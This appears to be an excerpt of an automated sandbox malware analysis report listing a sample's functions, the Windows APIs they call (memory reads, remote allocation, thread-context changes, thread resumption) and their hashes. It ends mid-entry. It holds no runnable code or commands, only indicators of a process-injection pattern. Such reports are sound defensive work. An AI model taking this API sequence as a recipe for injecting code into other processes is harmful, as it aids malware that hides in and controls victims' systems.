                • Opcode Fuzzy Hash: bc8c523304f588ed2509a7eee6e60ba5e98a84467e18797b3f4ab4146c03b7a5
                • Instruction Fuzzy Hash: B9212575D003499FCB10DFA9C985BEEBBF5FF48320F10842AE919A7241D778A944DBA4
                Function 06F6A2C0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                Download Yara Rule
                APIs
                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06F6A357
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID: DrawText
                • String ID:
                • API String ID: 2175133113-0
                • Opcode ID: c04412fc86b20fa365982dab07b0e0fe61d81d562e73c24697ee30a4e7d7a12d
                • Instruction ID: 0eb956ea4ba23e5c4942461789abe182b7dd465ae369a59ae4810b008f029657
                • Opcode Fuzzy Hash: c04412fc86b20fa365982dab07b0e0fe61d81d562e73c24697ee30a4e7d7a12d
                • Instruction Fuzzy Hash: 9721DFB5D002499FDB10CF9AD985ADEFBF4FB48320F24842AE919A7210D775A944CFA0
                Function 06F8E870 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                Download Yara Rule
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F8E8F8
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: 8c7453f763c4630e7e214ddba63d0af371149949ede58b379926174ee94c0f15
                • Instruction ID: 09c31bc45662ad357445d24e93c31036cb80ee1b7fea589cd7ff6936dc3ab4f2
                • Opcode Fuzzy Hash: 8c7453f763c4630e7e214ddba63d0af371149949ede58b379926174ee94c0f15
                • Instruction Fuzzy Hash: 9A215771C002499FCF10DFA9C880AEEBBF5FF48320F10842AE918A7240C7359940CBA0
                Function 06F8E1B2 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                Download Yara Rule
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F8E236
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: cbf588090fc94effb24664c699af04108d3768c9f7a54011b5da365bbf1d5d14
                • Instruction ID: aee056f9cf64240ea7379511e6663e9cf8f02a18700eb28428dc461cc7eb3fe0
                • Opcode Fuzzy Hash: cbf588090fc94effb24664c699af04108d3768c9f7a54011b5da365bbf1d5d14
                • Instruction Fuzzy Hash: 1D213971D002098FDB14DFAAC5857EEBBF4EF48324F54842AD419A7241DB78A985CFA4
                Function 0119D2B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0119D74E,?,?,?,?,?), ref: 0119D80F
                Memory Dump Source
                • Source File: 00000005.00000002.2197628622.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_1190000_x.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: e68908ecb34d4958a4b8aba10aae69d49c4f1fea5b90a821e32675776c2793a7
                • Instruction ID: 25b2fa52d58f6d2da807206a12916c75347dc76f9834d264e0e191a76629a441
                • Opcode Fuzzy Hash: e68908ecb34d4958a4b8aba10aae69d49c4f1fea5b90a821e32675776c2793a7
                • Instruction Fuzzy Hash: 8A21D4B59002489FDB14CF99D984AEEBBF4EB48310F14805AE918A7251D374A954CFA5
                Function 06F8E1B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                Download Yara Rule
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F8E236
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 51fa1a84c108fa0c0135e4e7b74b18ac6dc9a63c266e5cc889ef105b7fbf87ab
                • Instruction ID: fffcf9035534ab34edcfb07ab751e19a86ebda35d0e98bae07196832b668ab0d
                • Opcode Fuzzy Hash: 51fa1a84c108fa0c0135e4e7b74b18ac6dc9a63c266e5cc889ef105b7fbf87ab
                • Instruction Fuzzy Hash: 97213571D002098FDB10DFAAC9857AEBBF4EF88324F14842AD419A7241CB78A945CFA0
                Function 06F8E878 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                Download Yara Rule
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F8E8F8
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: 2ea82c21f8f71c7ee9570e88675dd2a24f5ab7aad11df84187163664f3db2795
                • Instruction ID: 255f8f929a9cdf8751d2f92d16487b22c58d869ffb46ee493c8333f41dbad2f0
                • Opcode Fuzzy Hash: 2ea82c21f8f71c7ee9570e88675dd2a24f5ab7aad11df84187163664f3db2795
                • Instruction Fuzzy Hash: D8211671D002599FDB10DFAAC984AEEFBF5FF48320F50842AE519A7240C7749940DBA0
                Function 0119D780 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0119D74E,?,?,?,?,?), ref: 0119D80F
                Memory Dump Source
                • Source File: 00000005.00000002.2197628622.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_1190000_x.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 9236c09745dcc76794f99ebc7dcd79f73bb1836d22a3a3e34fde25292df5a7c6
                • Instruction ID: 09e83680ae7367cc84a80a0d7a7a444c8c6b2331fab13cf5f5e2cbb55c9157be
                • Opcode Fuzzy Hash: 9236c09745dcc76794f99ebc7dcd79f73bb1836d22a3a3e34fde25292df5a7c6
                • Instruction Fuzzy Hash: 662114B5D00209DFDB10CFA9D984AEEFBF9FB48310F14801AE918A7250D334A945CFA0
                Function 06F8E6C0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F8E736
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 66aad1b98625d1a906d6af5e89c554d19e46937d9569eb81ab86cddc80c46604
                • Instruction ID: 5729a305bf5fd951d44c2db3d15c533893d25761c8cb503d203383c398aa9ad9
                • Opcode Fuzzy Hash: 66aad1b98625d1a906d6af5e89c554d19e46937d9569eb81ab86cddc80c46604
                • Instruction Fuzzy Hash: 2F1147728002499FDB10DFA9C944AEFBFF5EF48320F148419E555A7250CB759550DBA0
                Function 06F6AF40 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                Download Yara Rule
                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06F6C00A,?,?,?,?,?), ref: 06F6C0AF
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 3a51baf674d16fb2ce042286acff180b8da0f938060bdced1771b42826b3cfd5
                • Instruction ID: 8bc923c1593c6ec24a1bd7b4bfb9adade81c915af5e51ed7e39552bf0ec87019
                • Opcode Fuzzy Hash: 3a51baf674d16fb2ce042286acff180b8da0f938060bdced1771b42826b3cfd5
                • Instruction Fuzzy Hash: 041137B6800249DFDB20CF9AC944BEEBFF8EF48320F14841AE955A7250C375A954DFA5
                Function 06F8E100 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: baf7b7ead1366a354b268d632fe46f9514b1a1fd31b4b98387319b8894670993
                • Instruction ID: 8536c770de0ca03b838367ed88850899b96bfb9891336b5692616b2106fe51a7
                • Opcode Fuzzy Hash: baf7b7ead1366a354b268d632fe46f9514b1a1fd31b4b98387319b8894670993
                • Instruction Fuzzy Hash: 9A114971D002498FDB20DFAAD9857EEFBF4EF89324F14841AD419A7240CB35A941CBA4
                Function 06F8E6C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F8E736
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 1b6713c37088afa81a5f0de8fd07f927b77ee743994a26954fbfb4e8391073e6
                • Instruction ID: 50318715b63f30b6ed846e9f599d1c10107a1560a872f065bb699de8c81696e1
                • Opcode Fuzzy Hash: 1b6713c37088afa81a5f0de8fd07f927b77ee743994a26954fbfb4e8391073e6
                • Instruction Fuzzy Hash: B61126769002499FDB10DFAAC944AEEBFF5EF88320F148419E519A7250CB75A944DBA0
                Function 06F8E108 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: ec59c671131886cfba51cdcd2647979e6da8d2c66786623e8476a890606bd3a6
                • Instruction ID: 9b6d35e77850c1a82581a34efbe5cd8b26bdeced18ee8a673e4cbc603a331a01
                • Opcode Fuzzy Hash: ec59c671131886cfba51cdcd2647979e6da8d2c66786623e8476a890606bd3a6
                • Instruction Fuzzy Hash: 25113A71D002498FDB20DFAAC9457AFFBF4EF88724F148419D519A7240CB756944CBA4
                Function 07D723C0 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 07D72425
                Memory Dump Source
                • Source File: 00000005.00000002.2201724138.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7d70000_x.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 83c267770f00fca4c04eb85d5d685df709e74383f1ec44479dff143857aa773a
                • Instruction ID: aedc795d2117e94198f6b300509bc30f2806d845c9b47af00dded653a535c1f1
                • Opcode Fuzzy Hash: 83c267770f00fca4c04eb85d5d685df709e74383f1ec44479dff143857aa773a
                • Instruction Fuzzy Hash: E011F5B58002499FCB10DF9AD985BDEFBF8FB58324F10841AE518A7601D375A544CFA1
                Function 0119B498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0119B4FE
                Memory Dump Source
                • Source File: 00000005.00000002.2197628622.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_1190000_x.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: bee82397f26efcc1452d179218981970f6caa688dc4fae780241c0a24ed91b36
                • Instruction ID: f8873a6f230ddae8ece3122097726dcb9623b77856335cc548e223a97c1fa7d6
                • Opcode Fuzzy Hash: bee82397f26efcc1452d179218981970f6caa688dc4fae780241c0a24ed91b36
                • Instruction Fuzzy Hash: 201110B6C042498FDB24CF9AD944ADEFBF4EB88324F14841AD529A7200C375A545CFA5
                Function 07D723C8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 07D72425
                Memory Dump Source
                • Source File: 00000005.00000002.2201724138.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7d70000_x.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 4321813cecd9d87523442da9ef9e231bc81c8669b33afc925b5c2999b5bd077d
                • Instruction ID: e40053b507bae681cbf10afedc8880cb50a47dfed6aa52ae4bb45d3b42ad5c8b
                • Opcode Fuzzy Hash: 4321813cecd9d87523442da9ef9e231bc81c8669b33afc925b5c2999b5bd077d
                • Instruction Fuzzy Hash: 5111D0B58003499FDB10DF9AD985BDEFBF8FB58324F10845AE518A7240D375A944CFA1
                Function 06F9E7B0 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID: PHeq
                • API String ID: 0-2873676430
                • Opcode ID: 43944447b0f4b2606d953d9814440728d941160e22898cad5944511df5ef4842
                • Instruction ID: 1b6b5c8af816e428d74c8fc14c324c13dcdc0074f4b5b1eb9e45a7a8467a4496
                • Opcode Fuzzy Hash: 43944447b0f4b2606d953d9814440728d941160e22898cad5944511df5ef4842
                • Instruction Fuzzy Hash: 6D518B31B006018FEB99CF65C998BA9BBB1FF49704F1581A9E446DB2A1CB31EC45CB60
                Function 06F9E9AC Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID: (iq
                • API String ID: 0-3943945277
                • Opcode ID: 383ea754d8aa825fce1afb9a70a38403d63508c76ff31c59c513b241c466ebaa
                • Instruction ID: b72f9b4167650a8d7867884f644bfb6eca1c4bdd8af4698283935a0305029464
                • Opcode Fuzzy Hash: 383ea754d8aa825fce1afb9a70a38403d63508c76ff31c59c513b241c466ebaa
                • Instruction Fuzzy Hash: 46416E30B106008FDBA5DF38C849B5A37A6BF85315F558569E05ACB2B2DF74E88ACB50
                Function 06F6D635 Relevance: 1.3, APIs: 1, Instructions: 57COMMON
                Download Yara Rule
                APIs
                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06F6DDB9,?,?), ref: 06F6DF60
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: b1343989c0b419ff40c0fc75fb14b49f2bc0bc206b2f685cd9222bd7274e5b15
                • Instruction ID: 633369cd72c9604235530911f67458eab06dfd05892894049575a5f0e18e9a18
                • Opcode Fuzzy Hash: b1343989c0b419ff40c0fc75fb14b49f2bc0bc206b2f685cd9222bd7274e5b15
                • Instruction Fuzzy Hash: A8116AB18043598FCB10DFA9C444BDEBFF4EF49320F14845AE554A7241C338A545CBA5
                Function 06F6D644 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06F6DDB9,?,?), ref: 06F6DF60
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: 93d1549dbe6f1f798f9ee5eeb2cfdc6710ba4d44772e01ab8b444d4c2044a764
                • Instruction ID: 5e55c094782215242371aed3d90e6bb744ede66b0bf850b1ce606676ac888dde
                • Opcode Fuzzy Hash: 93d1549dbe6f1f798f9ee5eeb2cfdc6710ba4d44772e01ab8b444d4c2044a764
                • Instruction Fuzzy Hash: DA1152B6800249CFDB60DF9AC544BEEBBF4EF48320F10841AE918A7240C338A944CFA5
                Function 06F6DF00 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                Download Yara Rule
                APIs
                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06F6DDB9,?,?), ref: 06F6DF60
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: e305a631df9d49587b55f6b1a3031f6744c356cefc918d83415bd0f166dd40d6
                • Instruction ID: fe907da6df5d8720273ea63adff6fe485902ed02437d267c55e83e5af3820647
                • Opcode Fuzzy Hash: e305a631df9d49587b55f6b1a3031f6744c356cefc918d83415bd0f166dd40d6
                • Instruction Fuzzy Hash: 501113B58002498FCB60DF9AC545BDEBBF4EF48320F10845AE958A7240D738A944CFA5
                Function 06F954C0 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID: 4'eq
                • API String ID: 0-1552367303
                • Opcode ID: cdb8888b595268cb0d3ac99ca51eee41dea4c2e212592e849e5cc0021d0d142a
                • Instruction ID: 672283671690f721f0a7fee15dbc78fc8ebd27ce39c4fa509749c55451318501
                • Opcode Fuzzy Hash: cdb8888b595268cb0d3ac99ca51eee41dea4c2e212592e849e5cc0021d0d142a
                • Instruction Fuzzy Hash: A41191705192C59FCB03EB78E86594EBFB0EF07204B0946DAE4859F2A3DA385906CB52
                Function 06F954E8 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID: 4'eq
                • API String ID: 0-1552367303
                • Opcode ID: f55e495972b11a63bd7e506ff8686a2214bf5152020519b6f4a42b91c15882d7
                • Instruction ID: 55180f4cedfaa821c89ec9dac1f1934cb001ba0c479aa774028d54efe379f096
                • Opcode Fuzzy Hash: f55e495972b11a63bd7e506ff8686a2214bf5152020519b6f4a42b91c15882d7
                • Instruction Fuzzy Hash: F2F03C70A20609EFCB44EFB8E55599D7FF1FF48304B5045A9E805E7256EE346E068B50
                Function 06F9B62B Relevance: .4, Instructions: 410COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f4576168201d4e064a681121dedb40012ae5c32183cfdd568c7f81f172c75906
                • Instruction ID: 2b6b8a6dcb5df3a9bbc435fb753c130c3b3abe8237dfdf37a5d07fba3d0defdc
                • Opcode Fuzzy Hash: f4576168201d4e064a681121dedb40012ae5c32183cfdd568c7f81f172c75906
                • Instruction Fuzzy Hash: B0022774B001049FDB85DF68D498AAE7BF2FF89314F5581A8E4099B3A6CB31EC85CB50
                Function 06F93528 Relevance: .2, Instructions: 167COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1ae4c954cbc64beca57fcbabdb6feecc62b576884731071f998c0bb7771cff91
                • Instruction ID: 899815a92768d17614c7755fd22ccc936a435af726658e8c838c1c6d08d69afe
                • Opcode Fuzzy Hash: 1ae4c954cbc64beca57fcbabdb6feecc62b576884731071f998c0bb7771cff91
                • Instruction Fuzzy Hash: 9A51BD72B106019FEB54EB68C494B6EB7F6EF89314F104469E40ADB3A1CB71EC45CBA1
                Function 06F93518 Relevance: .1, Instructions: 129COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a2a8d113770d959c0476a1f81734bc3b55b83cfa6394c62582f363ab884e9340
                • Instruction ID: 8eb19a59092e3a67760d886f8fa4df806fb6472d204ad29239581458438d9dba
                • Opcode Fuzzy Hash: a2a8d113770d959c0476a1f81734bc3b55b83cfa6394c62582f363ab884e9340
                • Instruction Fuzzy Hash: 9E418C71B102019FEB54DB68D494AAABBB6EF89304F144469E40A9B361CB71EC45CBA1
                Function 06F9C140 Relevance: .1, Instructions: 117COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: afa74b80c357f413c0f90df321679c4785c8013e918ba0d1c7cd1b4885e4b2c3
                • Instruction ID: 64b62e0b29b3eb1e22bb512779ab745ffcb09cad71852160e2c8708e697649c3
                • Opcode Fuzzy Hash: afa74b80c357f413c0f90df321679c4785c8013e918ba0d1c7cd1b4885e4b2c3
                • Instruction Fuzzy Hash: 8441A731B006009FEFA9DB65CC84B7EB3A2FF85310F104529D1568B3A1CB71AC42CBA1
                Function 06F95DE8 Relevance: .1, Instructions: 117COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f5a7698d574f42818cd829124c98ae500489dbba7bbdeed7b0d183a176a31bfe
                • Instruction ID: 2de54f49cb62ca64860cc7fd4dcfa4cfa3ea28f0935102ad8bff86f987ab0296
                • Opcode Fuzzy Hash: f5a7698d574f42818cd829124c98ae500489dbba7bbdeed7b0d183a176a31bfe
                • Instruction Fuzzy Hash: 0D41F631B016009FDB66D624D844BBBB7E5EFC5314F44846EE41ACB281CB76E84ACBA1
                Function 06F9C130 Relevance: .1, Instructions: 116COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f00300eed1fc87d0810e03f402cb00ccfbf4c05960d9c57d1d6bf7580a13cdcc
                • Instruction ID: 617f05cabc7a850755a15ca617dfee46bd69f75c603299a6af088da67d788db5
                • Opcode Fuzzy Hash: f00300eed1fc87d0810e03f402cb00ccfbf4c05960d9c57d1d6bf7580a13cdcc
                • Instruction Fuzzy Hash: 36419631B006008FEFA59B74CC94B7AB3B2BF86314F144569D1568B3A1CB71AD46CBA1
                Function 06F98A70 Relevance: .1, Instructions: 108COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9fa3d42661dd6e932906703785de533bc36b61ad99609393b374ee79c6f8f807
                • Instruction ID: 86e2215b297ae100ac1e5349ffdeb1efe5b44cbb67a93088f89f1441834b06e7
                • Opcode Fuzzy Hash: 9fa3d42661dd6e932906703785de533bc36b61ad99609393b374ee79c6f8f807
                • Instruction Fuzzy Hash: 9141AF70700A009FDB55AF38D45862EBBF6FF8A251B144A6DE016C73A1EF34E806CB51
                Function 06F97DA4 Relevance: .1, Instructions: 106COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fedb50399f78233b4d8ea5912db4af05e23f54c1fd5f7fa0adb32fbd35330bec
                • Instruction ID: e9f9e5517ab6898baa66082bfcb673481f2544a8063780c33af2db279666e991
                • Opcode Fuzzy Hash: fedb50399f78233b4d8ea5912db4af05e23f54c1fd5f7fa0adb32fbd35330bec
                • Instruction Fuzzy Hash: A631D731B193809FDB47AB28D850A9A7FB29FC6351B1B44EBE541CF2A2DA34DC05C761
                Function 06F98A80 Relevance: .1, Instructions: 102COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7b93d5126d367b4d26886c91d2fb556785a3bda3e06b697a11bf3fa739afcfc5
                • Instruction ID: fbdb96b0ec1c4694fabe6e563da104bb21ffecb6b51653f8cb81b7a71621291d
                • Opcode Fuzzy Hash: 7b93d5126d367b4d26886c91d2fb556785a3bda3e06b697a11bf3fa739afcfc5
                • Instruction Fuzzy Hash: 50318E707006109FDB59AF38D45862EBBF6FF89251B144A2CE01AC73A0EF34E906CB51
                Function 06F9CCE0 Relevance: .1, Instructions: 101COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0623bf08235985e535467546ac038ee104e51b717c37da3b9ead4e4362469a02
                • Instruction ID: 85c417069aea10e9060b1224e52374ffd9be83904a900aafa67c001a22c583ba
                • Opcode Fuzzy Hash: 0623bf08235985e535467546ac038ee104e51b717c37da3b9ead4e4362469a02
                • Instruction Fuzzy Hash: 67311C34B10A008FEB94DB39C884F6A77A6FF84715F2584A9E55ACB361DE31E841CB60
                Function 06F9FD38 Relevance: .1, Instructions: 98COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
